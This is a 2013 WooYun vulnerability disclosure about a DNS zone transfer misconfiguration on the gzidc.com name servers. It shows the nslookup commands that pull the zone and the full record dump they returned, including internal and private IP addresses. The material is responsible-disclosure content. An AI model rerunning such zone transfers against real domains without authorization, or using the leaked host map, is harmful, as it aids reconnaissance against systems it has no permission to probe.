当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039130

漏洞标题:四星运营商金万邦科技# DNS域传送漏洞一枚

相关厂商:新一代数据中心

漏洞作者: 爱上平顶山

提交时间:2013-10-09 11:20

修复时间:2013-11-23 11:21

公开时间:2013-11-23 11:21

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

0.0

详细说明:

金万邦科技 DNS域传送漏洞
C:\Documents and Settings\Administrator>nslookup
Default Server: google-public-dns-a.google.com
Address: 8.8.8.8
> gzidc.com
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
Name: gzidc.com
Address: 211.147.245.88
> set type=ns
> gzidc.com
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
gzidc.com nameserver = ns.gzidc.com
gzidc.com nameserver = ns1.gzidc.com
> server ns.gzidc.com
Default Server: ns.gzidc.com
Address: 211.155.27.88
> ls gzidc.com
[ns.gzidc.com]
gzidc.com. NS server = ns.gzidc.com
gzidc.com. NS server = ns1.gzidc.com
gzidc.com. A 211.147.245.88
3lines A 211.147.235.76
ac A 218.30.103.207
agent A 211.147.246.8
arp A 10.10.1.105
cache A 211.147.249.199
cloud A 124.173.145.88
cloud A 211.147.245.88
cnc A 58.248.4.118
cs A 10.10.1.105
cservice A 211.147.246.10
ctc A 211.147.224.89
download A 211.155.23.29
faq A 124.172.244.102
help A 124.172.244.102
icann A 59.188.81.196
icp A 211.147.246.11
icpadmin A 211.147.246.11
icpmember A 211.147.246.11
info A 10.10.1.108
kefu A 10.10.1.105
mail A 211.155.27.23
mrtg A 192.168.100.45
mrtg2 A 192.168.100.21
mx1 A 211.147.224.89
mx2 A 211.147.224.88
new A 124.173.145.88
new A 211.147.245.88
ns A 211.155.27.88
ns1 A 124.172.251.8
ns2 A 61.144.40.68
ns3 A 124.173.145.90
ns3 A 124.173.145.91
ns4 A 124.173.65.90
ns4 A 124.173.65.91
ns5 A 61.144.40.92
ns5 A 61.144.40.93
ns5 A 124.173.65.29
ns5 A 124.173.65.30
ns6 A 124.172.157.92
ns6 A 124.172.157.93
ns6 A 124.173.65.92
ns6 A 124.173.65.93
ns7 A 124.173.145.25
ns8 A 124.172.157.88
old A 124.173.145.88
old A 211.147.245.88
ping A 211.155.23.29
rs A 124.173.144.198
store A 211.147.246.8
tech A 10.10.1.108
traffic A 211.147.235.73
traffic2 A 211.147.235.75
vps A 124.173.145.88
vps A 211.147.245.88
web A 211.147.246.8
wh A 124.172.129.131
whois A 211.147.246.8
wsus A 124.172.251.67
www A 124.173.145.88
www A 211.147.245.88
>

0.png

漏洞证明:

0.png

修复方案:

ok 补。

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝